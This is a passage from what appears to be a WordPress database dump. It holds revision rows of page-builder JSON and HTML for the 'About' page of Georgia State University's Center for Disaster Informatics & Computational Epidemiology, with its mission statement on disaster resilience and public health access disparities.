18:14:45','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c7\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c8\",\"index\":0,\"id\":\"122-c9\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c8\",\"index\":1,\"id\":\"122-c10\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c8\",\"index\":2,\"id\":\"122-c11\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region<\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c7\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c7\",\"parentId\":\"122-c6\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c6\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c16\",\"parentId\":\"122-c14\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c16\",\"index\":0,\"id\":\"122-c17\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c16\",\"index\":2,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c13\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c43\",\"parentId\":\"122-c42\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c43\",\"index\":0,\"id\":\"122-c45\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c42\",\"parentId\":\"122-c35\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c40\",\"parentId\":\"122-c39\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The center\\u2019s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions\\u2019 resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services<\\/p>\"}}],\"id\":\"122-c39\",\"parentId\":\"122-c38\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c35\",\"index\":0,\"id\":\"122-c38\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c35\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-02-16 18:14:45','2022-02-16 18:14:45','',353,'https://gsudice.dataconn.net/?p=360',0,'revision','',0),(361,1,'2022-02-16 18:14:45','2022-02-16 18:14:45','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c6\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c6 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c7\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c7 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c9\" class=\"h-global-transition-all h-heading style-288 style-local-122-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c9\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c10\" class=\"h-global-transition-all h-heading style-289 style-local-122-c10 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c10\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c11\" class=\"h-text h-text-component style-290 style-local-122-c11 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters,\n                      it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c13\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c13 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c14\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c14 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c15-outer\">\n            <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c15 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c16-outer\">\n            <div data-colibri-id=\"122-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c17\" class=\"h-global-transition-all h-heading style-296 style-local-122-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c19\" class=\"h-text h-text-component style-298 style-local-122-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c35\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c35 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c42\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c42 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c43-outer\">\n            <div data-colibri-id=\"122-c43\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c43 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c45\" class=\"h-global-transition-all h-heading style-324 style-local-122-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c45\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Our Mission</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c38\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c38 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c39-outer\">\n            <div data-colibri-id=\"122-c39\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c39 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c40\" class=\"h-text h-text-component style-319 style-local-122-c40 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources\n                      or health services</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 18:14:45','2022-02-16 18:14:45','',122,'https://gsudice.dataconn.net/?p=361',0,'revision','',0),(367,1,'2022-02-16 18:14:58','2022-02-16 18:14:58','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c7\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c8\",\"index\":0,\"id\":\"122-c9\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c8\",\"index\":1,\"id\":\"122-c10\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c8\",\"index\":2,\"id\":\"122-c11\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region<\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c7\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c7\",\"parentId\":\"122-c6\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c6\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c16\",\"parentId\":\"122-c14\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c16\",\"index\":0,\"id\":\"122-c17\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c16\",\"index\":2,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c13\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c43\",\"parentId\":\"122-c42\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c43\",\"index\":0,\"id\":\"122-c45\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c42\",\"parentId\":\"122-c35\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c40\",\"parentId\":\"122-c39\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The center\\u2019s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions\\u2019 resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services<\\/p>\"}}],\"id\":\"122-c39\",\"parentId\":\"122-c38\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c35\",\"index\":0,\"id\":\"122-c38\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c35\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-02-16 18:14:58','2022-02-16 18:14:58','',353,'https://gsudice.dataconn.net/?p=367',0,'revision','',0),(368,1,'2022-02-16 18:14:58','2022-02-16 18:14:58','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c6\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c6 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c7\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c7 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c9\" class=\"h-global-transition-all h-heading style-288 style-local-122-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c9\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c10\" class=\"h-global-transition-all h-heading style-289 style-local-122-c10 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c10\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c11\" class=\"h-text h-text-component style-290 style-local-122-c11 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters,\n                      it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c13\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c13 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c14\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c14 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c15-outer\">\n            <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c15 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c16-outer\">\n            <div data-colibri-id=\"122-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c17\" class=\"h-global-transition-all h-heading style-296 style-local-122-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c19\" class=\"h-text h-text-component style-298 style-local-122-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c35\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c35 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c42\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c42 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c43-outer\">\n            <div data-colibri-id=\"122-c43\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c43 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c45\" class=\"h-global-transition-all h-heading style-324 style-local-122-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c45\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Our Mission</h3>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c38\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c38 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer 